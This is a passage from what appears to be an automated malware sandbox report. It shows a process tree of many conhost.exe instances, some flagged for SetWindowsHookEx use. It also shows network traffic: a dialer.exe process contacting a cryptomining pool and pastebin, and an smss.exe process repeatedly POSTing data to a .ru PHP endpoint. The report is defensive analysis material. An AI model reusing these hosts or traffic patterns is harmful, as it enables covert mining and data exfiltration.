                                                                    PID:2180
                                                                  • C:\Windows\system32\conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe "1239396195-292214100-454327888-1649475064213913645414500482541752700988-1597111423"
                                                                    1⤵
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:2856
                                                                  • C:\Windows\system32\conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe "-7075722531161000719-82764004-2638859007135210721029075461577017711154112323"
                                                                    1⤵
                                                                      PID:472
                                                                    • C:\Windows\system32\conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe "4254076642142352329-2059788238975856282-650389535-16245161831744626369795119788"
                                                                      1⤵
                                                                        PID:3036
                                                                      • C:\Windows\system32\conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe "-5529469832001375000-1967454336-900338911-2031445917-11640724591753841771-1690655872"
                                                                        1⤵
                                                                          PID:3048
                                                                        • C:\Windows\system32\conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe "15254807391762701935717718781681309016548904411-2070369658-2379999121853867008"
                                                                          1⤵
                                                                            PID:1424
                                                                          • C:\Windows\system32\conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe "-5300316512327390671423387919-1115260302-1001528772099008581779508663-1916071747"
                                                                            1⤵
                                                                              PID:2284
                                                                            • C:\Windows\system32\conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe "166255556936998823211796972-677799809910178573-743648069998253000-1933472010"
                                                                              1⤵
                                                                                PID:3044
                                                                              • C:\Windows\system32\conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe "-140614829511758518511371297343468391883-201018098341853986-1328543991-1843117274"
                                                                                1⤵
                                                                                  PID:2744
                                                                                • C:\Windows\system32\conhost.exe
                                                                                  \??\C:\Windows\system32\conhost.exe "1449395085525815516-95749627-803988440-139133198-182056308-1251743404267976837"
                                                                                  1⤵
                                                                                    PID:2520
                                                                                  • C:\Windows\system32\conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe "-5799938921689700574-1708673886-423465928-1689122428-2067055528-1567484141922916916"
                                                                                    1⤵
                                                                                      PID:988
                                                                                    • C:\Windows\system32\conhost.exe
                                                                                      \??\C:\Windows\system32\conhost.exe "293758439-1847813849-5154985171268627019-416699558-12584129651141116441855938459"
                                                                                      1⤵
                                                                                        PID:2364
                                                                                      • C:\Windows\system32\conhost.exe
                                                                                        \??\C:\Windows\system32\conhost.exe "-870525574-124751479-1615527090-2053111270-46508427414226483101845688663-1709857480"
                                                                                        1⤵
                                                                                          PID:1940
                                                                                        • C:\Windows\system32\conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe "-18747285511813282931205373788018886816671512109253-9689879205307529461997099780"
                                                                                          1⤵
                                                                                            PID:1488
                                                                                          • C:\Windows\system32\conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe "-118212457461466326811933757023672942334501035281643427800737735335-132580235"
                                                                                            1⤵
                                                                                              PID:2664
                                                                                            • C:\Windows\system32\conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe "802052171-428321671-1402624478-59831651191409702653328793800052080395487509"
                                                                                              1⤵
                                                                                                PID:1852
                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe "-972142147-1299365973-8324774791067520330-964933243-1522200409-20754035031328399634"
                                                                                                1⤵
                                                                                                  PID:2924
                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe "-1666110230117897485781372551206867964817998584295288985354748177261381872544"
                                                                                                  1⤵
                                                                                                    PID:2512
                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe "-538203700-1082106027-11076830941189196763-19387696825571742021356134668-1238929929"
                                                                                                    1⤵
                                                                                                      PID:1268
                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe "12392308401096181692-458595492-1438931791986032141291546788187999239742813746"
                                                                                                      1⤵
                                                                                                        PID:2468
                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe "-234883349-1810990454-2125757256-1451308057-938294716193499366942492266-1851115633"
                                                                                                        1⤵
                                                                                                          PID:2796
                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe "-990304876-1552565589341423264804908162-605570241-1447417684-831540551-2020156767"
                                                                                                          1⤵
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:1512

                                                                                                        Network

                                                                                                        • flag-us
                                                                                                          DNS
                                                                                                          pool.hashvault.pro
                                                                                                          dialer.exe
                                                                                                          Remote address:
                                                                                                          8.8.8.8:53
                                                                                                          Request
                                                                                                          pool.hashvault.pro
                                                                                                          IN A
                                                                                                          Response
                                                                                                          pool.hashvault.pro
                                                                                                          IN A
                                                                                                          95.179.241.203
                                                                                                        • flag-us
                                                                                                          DNS
                                                                                                          pastebin.com
                                                                                                          dialer.exe
                                                                                                          Remote address:
                                                                                                          8.8.8.8:53
                                                                                                          Request
                                                                                                          pastebin.com
                                                                                                          IN A
                                                                                                          Response
                                                                                                          pastebin.com
                                                                                                          IN A
                                                                                                          104.20.3.235
                                                                                                          pastebin.com
                                                                                                          IN A
                                                                                                          104.20.4.235
                                                                                                          pastebin.com
                                                                                                          IN A
                                                                                                          172.67.19.24
                                                                                                        • flag-us
                                                                                                          DNS
                                                                                                          uffyaa.ru
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          8.8.8.8:53
                                                                                                          Request
                                                                                                          uffyaa.ru
                                                                                                          IN A
                                                                                                          Response
                                                                                                          uffyaa.ru
                                                                                                          IN A
                                                                                                          104.21.9.141
                                                                                                          uffyaa.ru
                                                                                                          IN A
                                                                                                          172.67.160.132
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 344
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:40 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VxVzXb6RlrJvIOmn%2BV32YVUmdHRa3OLDQ%2BTwGINnFlwyekoskMMsdYHGw1B5ehdd69LJIy1fZ0qTLw2KDBM9j6l%2BU0OvkwjjRACtWm6Y%2F%2F3ns%2BBaDhRXE%2FKMkpo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc1d54b4288a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=50812&min_rtt=50451&rtt_var=19641&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=610&delivery_rate=25441&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 384
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:40 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zk%2FlrmsEDdKwzdH%2BvbmLgdMv7BevI4M2kIVHeUvwMvqv7PhIyDOb6iKYMJfK2TZHQSjqaO%2FDODVkf035lP53dtCYalvKDk8SWrtnB0%2B4OqDDS6s%2FdwJ9Ig6rJmI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc1d79e3488a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=64885&min_rtt=50451&rtt_var=36350&sent=9&recv=7&lost=0&retrans=0&sent_bytes=2237&recv_bytes=1236&delivery_rate=51594&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 2480
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:41 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qqTOUAIEKASz0hza8hg0YnWnwZUiS19tZzfmkkPiss3p3oJnucvD9RokNtK1iFkEJB4gsHD%2Fk86g7UKxb%2BsJqkrkiEn2idHmSKfwI1Tjr0xhF5%2BzXIY%2F94TByf4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc1db1b4e88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=62230&min_rtt=47954&rtt_var=24708&sent=14&recv=11&lost=0&retrans=0&sent_bytes=3211&recv_bytes=3959&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:42 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vta9rZ06l7UTpD3%2FNXRFr%2FQJcmzjQXUM1Wn5QCDCjnfnMHcY3FBC4PSf6rrDlMPelzaDqoVOUj0NRxCd8DIDPIBbV%2FizSY%2FvrufQ3NNJmUCr%2BRPJnZNjTmrk4XE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc1e35fe288a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=62688&min_rtt=47954&rtt_var=17590&sent=18&recv=15&lost=0&retrans=0&sent_bytes=4036&recv_bytes=5690&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:43 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KErmaBfrBg70rBvhBzERy2tIGLZFAxxt5sDxCX1H7HrU2caLC%2Fd7Mryet4o6c%2Bzf3ESvmvXWVBVj77YEf7YeYZ10lapOE7n9GFZy%2B9HU2P38o%2BCNC6pzKV5qWSA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc1eb4b2488a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=63040&min_rtt=47954&rtt_var=11048&sent=22&recv=19&lost=0&retrans=0&sent_bytes=5012&recv_bytes=7421&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:44 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z72TMqVcSPaQr8NmLqshGrYqT53yh67lAEfvAr9zEhSZzMNSIEb6Ih8uky5bPKqq2PHmMf%2Bm2FWwvbSr9H8AYFqqLjcIMYswjHZqk8MSl7qMdnTjHmO0Ksqg%2B0s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc1f30e4b88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=61352&min_rtt=47954&rtt_var=8632&sent=26&recv=23&lost=0&retrans=0&sent_bytes=5986&recv_bytes=9152&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:46 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T7zZbk656HvJ0PXienr0SqJBmZ4vDKPWBU%2FmIoOQjjG0nKYfAHOSgePhsj1NuznT5yn0x6S3UULBKDX%2Fz9SftIFPmcCf%2Blpr5Tcb4oXDdgByoPRk%2Br7x%2BFzYLUI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc1faa92b88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=59494&min_rtt=47954&rtt_var=7516&sent=30&recv=27&lost=0&retrans=0&sent_bytes=6955&recv_bytes=10883&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1476
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:47 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7vt%2FYtSEO28gLnA9yeyIatRXXkdSFG10ydS0dQZ0bTv7sLk3blXoaAkLHIKvIjfJTcKraT6yG0d1SLPKaTQjQfnyiDJ7Z3sK4GwQLLs3DbafuglTQtDnAT1nWaI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2025bd688a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=60266&min_rtt=47954&rtt_var=5760&sent=34&recv=31&lost=0&retrans=0&sent_bytes=7931&recv_bytes=12602&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:48 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PKiydp56HH%2F94Nze23IQyOl5MjYElcHRt62QujnS91Yhy1rUZfaCModENRuYTHlyt8VEaLl%2BWpkjVSo%2FKm%2Bwcy9OQqfbeVupgI%2Bm64XmtG%2FP0ljrFNDO%2B%2Fi%2Bd6g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc20a2edb88a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=60330&min_rtt=47954&rtt_var=5070&sent=38&recv=35&lost=0&retrans=0&sent_bytes=8899&recv_bytes=14333&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:49 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j%2BvIGBtWSeAVCDtIB%2FbNTQtilBE%2Fo1vm%2FtZAAyqiv6EzAfsBmkDwUAX7pLdHyEvjRVz64r%2FDIuV%2BwEXJ6AwVfmHmIzxcRh81wi9HNe8S3ATdsi5Q7p%2B6TtuT8tg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc211d9b288a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=59003&min_rtt=47954&rtt_var=3965&sent=42&recv=39&lost=0&retrans=0&sent_bytes=9883&recv_bytes=16064&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:51 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iXT9hglTBcRTtD3c1S8cUXsEnwRub2VgYtdHVd7IcjFMaFOQ587SKsIfIIY%2FKq1lQ1TJhXiL8tAQ1VU7giBV36g7q%2BRVanFgbCsB9YsZxa4xIlTlyKYd1E7eELU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc219adc488a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=57587&min_rtt=47954&rtt_var=4069&sent=46&recv=43&lost=0&retrans=0&sent_bytes=10863&recv_bytes=17795&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:52 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ay7S0dolmVJN5tTn8hg9bknXpmUSBV12Sm81AuwOdHiDTFUBx2oSo6rpIz0c2zYR5oK093BQ4xJk6V2xj0eac2UCMyiB1tNBbS2LlJgmgtnRFTDX4PImdOqxbQo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc22158f488a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=58230&min_rtt=47954&rtt_var=3579&sent=50&recv=47&lost=0&retrans=0&sent_bytes=11834&recv_bytes=19526&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:53 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dhcJJn%2FKtQ7VXI1H6JqdCX6hSgYRzMfFmmszLbB4Z3NVRkLEqGyKagtIQW64Mvr0pLR8%2F%2Bahw%2FHxKVRXnkuUdoLTHMrkucZ6WSoI8Lrh470OWsiTKjcRlkaaVE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1fc2297b8988a7-LHR
                                                                                                          alt-svc: h2=":443"; ma=60
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=58365&min_rtt=47954&rtt_var=3554&sent=54&recv=51&lost=0&retrans=0&sent_bytes=12801&recv_bytes=21257&delivery_rate=56413&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        • flag-us
                                                                                                          POST
                                                                                                          http://uffyaa.ru/Phpjavascript_Test.php
                                                                                                          smss.exe
                                                                                                          Remote address:
                                                                                                          104.21.9.141:80
                                                                                                          Request
                                                                                                          POST /Phpjavascript_Test.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                          Host: uffyaa.ru
                                                                                                          Content-Length: 1488
                                                                                                          Expect: 100-continue
                                                                                                          Response
                                                                                                          HTTP/1.1 200 OK
                                                                                                          Date: Sat, 14 Dec 2024 17:01:54 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
